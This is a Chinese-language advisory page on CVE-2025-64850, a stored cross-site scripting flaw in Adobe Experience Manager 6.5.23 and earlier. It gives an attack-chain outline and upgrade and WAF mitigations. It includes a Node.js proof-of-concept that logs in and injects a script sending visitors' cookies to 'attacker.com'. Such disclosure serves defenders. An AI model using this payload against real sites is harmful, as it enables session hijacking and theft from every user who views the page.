CVE-2025-64850 CVSS 5.4 中危

CVE-2025-64850 Adobe Experience Manager存储型XSS漏洞

披露日期: 2025-12-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64850

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

Adobe Experience Manager(AEM)6.5.23及更早版本存在一处存储型跨站脚本攻击(XSS)漏洞。该漏洞允许低权限攻击者在表单字段中注入恶意JavaScript脚本。当受害者浏览包含恶意字段的页面时，注入的脚本会在受害者浏览器中执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。由于漏洞属于存储型，恶意脚本会持久存在于服务器端，影响所有访问该页面的用户。

技术细节

该漏洞为存储型XSS，存在于AEM的表单处理模块中。攻击流程如下：1)攻击者以低权限用户身份登录AEM；2)在表单输入字段中构造恶意JavaScript payload，如<script>alert(document.cookie)</script>；3)恶意内容被存储到服务器数据库；4)当其他用户访问包含该字段的页面时，服务器从数据库读取并返回恶意内容；5)受害者浏览器执行注入的JavaScript代码。漏洞根源在于AEM对用户输入的过滤和转义不充分，未正确处理HTML特殊字符。由于AEM广泛应用于企业内容管理，攻击者可通过此漏洞横向移动或窃取敏感业务数据。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标AEM版本，确认版本号<=6.5.23，并定位存在漏洞的表单字段

STEP 2

认证阶段

攻击者以低权限用户身份登录AEM系统，获取基本访问权限

STEP 3

注入阶段

在表单输入字段中提交包含恶意JavaScript代码的payload，payload被存储到服务器数据库

STEP 4

触发阶段

受害者访问包含恶意字段的页面，服务器返回存储的恶意内容到受害者浏览器

STEP 5

执行阶段

受害者浏览器执行注入的JavaScript，攻击者窃取cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64850 Stored XSS PoC for Adobe Experience Manager
// Author: Security Researcher
// Target: Adobe Experience Manager <= 6.5.23

const axios = require('axios');
const qs = require('querystring');

async function exploitAEMXSS(baseUrl, username, password) {
  const session = axios.create({ baseURL: baseUrl });
  
  // Step 1: Authenticate
  const loginData = { j_username: username, j_password: password };
  await session.post('/libs/granite/core/content/login.html', qs.stringify(loginData));
  
  // Step 2: Identify vulnerable form field
  // Common vulnerable endpoints in AEM forms
  const formEndpoint = '/content/forms/af/your-form/jcr:content/guideContainer.html';
  
  // Step 3: Inject malicious XSS payload
  const xssPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';
  const maliciousData = {
    './jcr:title': xssPayload,
    './text': xssPayload,
    './description': xssPayload
  };
  
  try {
    await session.post(formEndpoint, qs.stringify(maliciousData), {
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' }
    });
    console.log('[+] XSS payload injected successfully');
    console.log('[+] Payload will execute when users visit the affected page');
  } catch (error) {
    console.error('[-] Exploitation failed:', error.message);
  }
}

// Usage
// exploitAEMXSS('https://vulnerable-aem-site.com', 'attacker_user', 'password');

影响范围

Adobe Experience Manager 6.5.23及更早版本

AEM 6.5.x所有版本 <= 6.5.23

防御指南

临时缓解措施

立即将Adobe Experience Manager升级至6.5.24或最新版本。在升级前，可通过WAF规则暂时过滤包含script标签的请求，并限制低权限用户对表单内容的修改权限。建议启用AEM的安全检查模块对用户输入进行实时过滤。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表